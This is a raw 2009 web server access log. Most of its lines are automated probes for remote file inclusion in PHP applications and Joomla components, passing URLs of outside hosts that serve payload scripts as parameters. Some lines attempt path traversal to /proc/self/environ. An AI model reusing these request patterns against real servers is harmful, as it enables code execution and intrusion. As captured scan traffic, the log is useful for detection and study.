142.104.151.101 - - [28/May/2009:11:40:55 -0500] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 323 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
142.104.151.101 - - [28/May/2009:11:40:55 -0500] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 318 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
142.104.151.101 - - [28/May/2009:11:40:55 -0500] "GET /logs/errors.php?error=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
142.104.151.101 - - [28/May/2009:11:40:55 -0500] "GET /errors.php?error=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
142.104.151.101 - - [28/May/2009:11:40:56 -0500] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 323 "-""XXXXXX"
142.104.151.101 - - [28/May/2009:11:40:56 -0500] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 318 "-""XXXXXX"
142.104.151.101 - - [28/May/2009:11:40:56 -0500] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""XXXXXX"
142.104.151.101 - - [28/May/2009:11:40:56 -0500] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 318 "-""XXXXXX"
89.111.176.64 - - [28/May/2009:11:51:22 -0500] "GET /logs////////?path%5Bdocroot%5D=http://www.votaya.com//pics/site/image?? HTTP/1.1" 200 191106 "-""libwww-perl/5.805"
89.111.176.64 - - [28/May/2009:11:51:23 -0500] "GET ////////?path%5Bdocroot%5D=http://www.votaya.com//pics/site/image?? HTTP/1.1" 200 3251 "-""libwww-perl/5.805"
213.206.93.3 - - [28/May/2009:11:51:43 -0500] "GET /logs/index.php?option=com_joomfish&task=section&id=1&Itemid=2&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
213.206.93.3 - - [28/May/2009:11:51:43 -0500] "GET /index.php?option=com_joomfish&task=section&id=1&Itemid=2&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
210.100.220.126 - - [28/May/2009:11:52:41 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
210.100.220.126 - - [28/May/2009:11:52:42 -0500] "GET //errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
85.17.162.28 - - [28/May/2009:11:53:01 -0500] "GET /agenda2.php3?rootagenda=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:11:53:01 -0500] "GET /logs/agenda2.php3?rootagenda=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:11:53:01 -0500] "GET /logs/access_log.1235606400/agenda2.php3?rootagenda=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
65.98.80.2 - - [28/May/2009:11:53:22 -0500] "GET /logs/access_log.1230768000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 354 "-""Mozilla/5.0"
65.98.80.2 - - [28/May/2009:11:53:22 -0500] "GET /logs/access_log.1237766400//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 354 "-""Mozilla/5.0"
65.98.80.2 - - [28/May/2009:11:53:22 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 332 "-""Mozilla/5.0"
65.98.80.2 - - [28/May/2009:11:53:22 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:11:53:32 -0500] "GET /logs/access_log.1238889600/agenda2.php3?rootagenda=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
213.206.93.3 - - [28/May/2009:11:54:22 -0500] "GET /logs/index.php?option=com_rsgallery&task=section&id=1&Itemid=2&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
213.206.93.3 - - [28/May/2009:11:54:22 -0500] "GET /index.php?option=com_rsgallery&task=section&id=1&Itemid=2&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
65.98.80.2 - - [28/May/2009:11:54:27 -0500] "GET /logs/access_log.1230768000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 354 "-""Mozilla/5.0"
65.98.80.2 - - [28/May/2009:11:54:27 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
65.98.80.2 - - [28/May/2009:11:54:27 -0500] "GET /logs/access_log.1237766400//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 354 "-""Mozilla/5.0"
65.98.80.2 - - [28/May/2009:11:54:27 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 332 "-""Mozilla/5.0"
207.213.245.215 - - [28/May/2009:11:55:56 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
207.213.245.215 - - [28/May/2009:11:55:56 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
207.213.245.215 - - [28/May/2009:11:55:56 -0500] "GET /logs/access_log.1242518400/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
207.213.245.215 - - [28/May/2009:11:55:56 -0500] "GET /logs/access_log.1242086400/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
202.75.4.169 - - [28/May/2009:11:56:08 -0500] "GET /logs/index.php?option=com_joomfish&task=section&id=1&Itemid=2&mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
202.75.4.169 - - [28/May/2009:11:56:08 -0500] "GET /index.php?option=com_joomfish&task=section&id=1&Itemid=2&mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
65.55.208.142 - - [28/May/2009:11:59:03 -0500] "GET /logs/access_log.1156982400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.142 - - [28/May/2009:11:59:04 -0500] "GET /logs/access_log.1180828800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.142 - - [28/May/2009:11:59:05 -0500] "GET /logs/access_log.1217462400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.98.80.2 - - [28/May/2009:11:59:17 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
65.98.80.2 - - [28/May/2009:11:59:17 -0500] "GET /logs/access_log.1239753600//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
65.98.80.2 - - [28/May/2009:11:59:17 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
65.98.80.2 - - [28/May/2009:11:59:17 -0500] "GET /logs/access_log.1239494400//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
65.98.80.2 - - [28/May/2009:11:59:20 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
65.98.80.2 - - [28/May/2009:11:59:20 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
65.98.80.2 - - [28/May/2009:11:59:20 -0500] "GET /logs/access_log.1239753600//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
65.98.80.2 - - [28/May/2009:11:59:20 -0500] "GET /logs/access_log.1239494400//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
65.55.208.142 - - [28/May/2009:11:59:46 -0500] "GET /logs/access_log.1158537600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.142 - - [28/May/2009:11:59:46 -0500] "GET /logs/access_log.1149811200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.106.186 - - [28/May/2009:11:59:52 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
58.227.193.198 - - [28/May/2009:12:00:13 -0500] "GET /logs/access_log.1239062400//skin/zero_vote/ask_password.php?dir=http://tulokera.com/home/copyright.txt???? HTTP/1.1" 404 342 "-""Mozilla/5.0"
58.227.193.198 - - [28/May/2009:12:00:13 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://tulokera.com/home/copyright.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
58.227.193.198 - - [28/May/2009:12:00:13 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://tulokera.com/home/copyright.txt???? HTTP/1.1" 404 315 "-""Mozilla/5.0"
65.55.106.186 - - [28/May/2009:12:00:39 -0500] "GET /logs/access_log.1182384000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.208.111.178 - - [28/May/2009:12:01:31 -0500] "GET /logs/phphtml.php?htmlclass_path=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
74.208.111.178 - - [28/May/2009:12:01:31 -0500] "GET /phphtml.php?htmlclass_path=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
74.208.111.178 - - [28/May/2009:12:01:31 -0500] "GET /logs/phphtml.php?htmlclass_path=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
74.208.111.178 - - [28/May/2009:12:01:31 -0500] "GET /phphtml.php?htmlclass_path=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
85.17.162.28 - - [28/May/2009:12:01:59 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:12:01:59 -0500] "GET /logs/access_log.1233705600/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:12:01:59 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
210.100.220.126 - - [28/May/2009:12:02:12 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
210.100.220.126 - - [28/May/2009:12:02:13 -0500] "GET //errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
193.239.6.76 - - [28/May/2009:12:02:58 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 332 "-""Mozilla/5.0"
193.239.6.76 - - [28/May/2009:12:02:58 -0500] "GET /logs/access_log.1230768000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 354 "-""Mozilla/5.0"
193.239.6.76 - - [28/May/2009:12:02:58 -0500] "GET /logs/access_log.1237766400//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 354 "-""Mozilla/5.0"
193.239.6.76 - - [28/May/2009:12:02:59 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
209.216.213.145 - - [28/May/2009:12:03:02 -0500] "GET /htmltonuke.php?filnavn=http://www.xsports.si//1.txt???? HTTP/1.1" 404 297 "-""Mozilla/5.0"
209.216.213.145 - - [28/May/2009:12:03:02 -0500] "GET /logs/access_log.1242086400/htmltonuke.php?filnavn=http://www.xsports.si//1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
209.216.213.145 - - [28/May/2009:12:03:02 -0500] "GET /logs/htmltonuke.php?filnavn=http://www.xsports.si//1.txt???? HTTP/1.1" 404 302 "-""Mozilla/5.0"
207.213.245.215 - - [28/May/2009:12:03:27 -0500] "GET /logs//include/write.php?dir=http://208.98.22.241/id.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.65"
207.213.245.215 - - [28/May/2009:12:03:27 -0500] "GET //include/write.php?dir=http://208.98.22.241/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.65"
195.34.78.110 - - [28/May/2009:12:03:33 -0500] "GET /logs///administrator/components/com_virtuemart/toolbar.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
195.34.78.110 - - [28/May/2009:12:03:33 -0500] "GET ///administrator/components/com_virtuemart/toolbar.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
195.34.78.110 - - [28/May/2009:12:03:33 -0500] "GET /logs/access_log.1242086400///administrator/components/com_virtuemart/toolbar.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
195.34.78.110 - - [28/May/2009:12:03:34 -0500] "GET ///administrator/components/com_virtuemart/toolbar.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
195.34.78.110 - - [28/May/2009:12:03:34 -0500] "GET /logs///administrator/components/com_virtuemart/toolbar.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
195.34.78.110 - - [28/May/2009:12:03:34 -0500] "GET /logs/access_log.1242086400///administrator/components/com_virtuemart/toolbar.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
209.216.213.145 - - [28/May/2009:12:03:40 -0500] "GET /logs/access_log.1241654400/htmltonuke.php?filnavn=http://www.xsports.si//1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
209.216.213.145 - - [28/May/2009:12:03:41 -0500] "GET /logs/access_log.1239494400/htmltonuke.php?filnavn=http://www.xsports.si//1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
65.55.208.141 - - [28/May/2009:12:04:26 -0500] "GET /logs/access_log.1142208000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [28/May/2009:12:04:26 -0500] "GET /logs/access_log.1114300800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [28/May/2009:12:04:26 -0500] "GET /logs/access_log.1140566400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [28/May/2009:12:04:26 -0500] "GET /logs/access_log.1209859200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
74.208.111.178 - - [28/May/2009:12:06:17 -0500] "GET /logs/phphtml.php?htmlclass_path=http://dgsoft.50webs.com/3.php?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
74.208.111.178 - - [28/May/2009:12:06:17 -0500] "GET /phphtml.php?htmlclass_path=http://dgsoft.50webs.com/3.php?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.206.93.3 - - [28/May/2009:12:06:51 -0500] "GET /logs/access_log.1228608000/index.php?option=com_joomfish&task=section&id=1&Itemid=2&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
213.206.93.3 - - [28/May/2009:12:06:52 -0500] "GET /index.php?option=com_joomfish&task=section&id=1&Itemid=2&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
213.206.93.3 - - [28/May/2009:12:06:52 -0500] "GET /logs/index.php?option=com_joomfish&task=section&id=1&Itemid=2&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
207.213.245.215 - - [28/May/2009:12:07:19 -0500] "GET /logs/include/write.php?dir=http://208.98.22.241/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.65"
207.213.245.215 - - [28/May/2009:12:07:19 -0500] "GET /include/write.php?dir=http://208.98.22.241/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.65"
220.181.7.97 - - [28/May/2009:12:07:38 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
210.100.220.126 - - [28/May/2009:12:07:47 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
210.100.220.126 - - [28/May/2009:12:07:47 -0500] "GET //errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
202.75.4.169 - - [28/May/2009:12:09:33 -0500] "GET /logs/index.php?option=com_rsgallery&task=section&id=1&Itemid=2&mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
202.75.4.169 - - [28/May/2009:12:09:34 -0500] "GET /index.php?option=com_rsgallery&task=section&id=1&Itemid=2&mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
210.100.220.126 - - [28/May/2009:12:10:27 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
210.100.220.126 - - [28/May/2009:12:10:28 -0500] "GET //errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
211.172.225.50 - - [28/May/2009:12:10:33 -0500] "GET /logs/access_log.1228608000/errors.php?error=http://www.aziendainlinea.it/b1tchXs4f3.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
211.172.225.50 - - [28/May/2009:12:10:33 -0500] "GET /errors.php?error=http://www.aziendainlinea.it/b1tchXs4f3.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
211.172.225.50 - - [28/May/2009:12:10:33 -0500] "GET /logs/errors.php?error=http://www.aziendainlinea.it/b1tchXs4f3.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
218.249.36.194 - - [28/May/2009:12:11:08 -0500] "GET /logs/access_log.1234656000//include/mail.inc.php?skin_board_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
218.249.36.194 - - [28/May/2009:12:11:08 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
210.100.220.126 - - [28/May/2009:12:11:10 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
210.100.220.126 - - [28/May/2009:12:11:10 -0500] "GET //errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
218.249.36.194 - - [28/May/2009:12:11:12 -0500] "GET //include/mail.inc.php?skin_board_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
218.249.36.194 - - [28/May/2009:12:11:17 -0500] "GET /logs/access_log.1236902400//include/mail.inc.php?skin_board_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
88.183.32.67 - - [28/May/2009:12:11:31 -0500] "GET /logs//errors.php?error=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
88.183.32.67 - - [28/May/2009:12:11:31 -0500] "GET /logs/access_log.1227916800//errors.php?error=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
88.183.32.67 - - [28/May/2009:12:11:31 -0500] "GET //errors.php?error=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
88.183.32.67 - - [28/May/2009:12:11:32 -0500] "GET /logs/access_log.1226966400//errors.php?error=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
210.100.220.126 - - [28/May/2009:12:12:46 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
210.100.220.126 - - [28/May/2009:12:12:47 -0500] "GET //errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
210.100.220.126 - - [28/May/2009:12:13:15 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
74.50.5.250 - - [28/May/2009:12:15:49 -0500] "GET //content/view/64/157/index.php?option=com_content&Itemid=&mosConfig_absolute_path=http://www.snoeken.net//poll/polldata/fx29id1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
74.50.5.250 - - [28/May/2009:12:15:49 -0500] "GET /logs//content/view/64/157/index.php?option=com_content&Itemid=&mosConfig_absolute_path=http://www.snoeken.net//poll/polldata/fx29id1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
74.50.5.250 - - [28/May/2009:12:15:49 -0500] "GET /logs/access_log.1239753600//content/view/64/157/index.php?option=com_content&Itemid=&mosConfig_absolute_path=http://www.snoeken.net//poll/polldata/fx29id1.txt???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
74.50.5.250 - - [28/May/2009:12:15:54 -0500] "GET /logs/access_log.1234828800//content/view/64/157/index.php?option=com_content&Itemid=&mosConfig_absolute_path=http://www.snoeken.net//poll/polldata/fx29id1.txt???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
113.29.225.7 - - [28/May/2009:12:17:10 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/andrie_it/id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
113.29.225.7 - - [28/May/2009:12:17:10 -0500] "GET /logs/access_log.1233100800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/andrie_it/id1.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
113.29.225.7 - - [28/May/2009:12:17:11 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/andrie_it/id1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
113.29.225.7 - - [28/May/2009:12:17:11 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/andrie_it/id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
113.29.225.7 - - [28/May/2009:12:17:11 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/andrie_it/id1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
113.29.225.7 - - [28/May/2009:12:17:11 -0500] "GET /logs/access_log.1233100800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/andrie_it/id1.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
113.29.225.7 - - [28/May/2009:12:17:16 -0500] "GET /logs/access_log.1232841600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/andrie_it/id1.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
113.29.225.7 - - [28/May/2009:12:17:20 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/andrie_it/id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
113.29.225.7 - - [28/May/2009:12:17:20 -0500] "GET /logs/access_log.1233100800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/andrie_it/id1.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
113.29.225.7 - - [28/May/2009:12:17:20 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/andrie_it/id1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
113.29.225.7 - - [28/May/2009:12:17:26 -0500] "GET /logs/access_log.1232841600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/andrie_it/id1.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
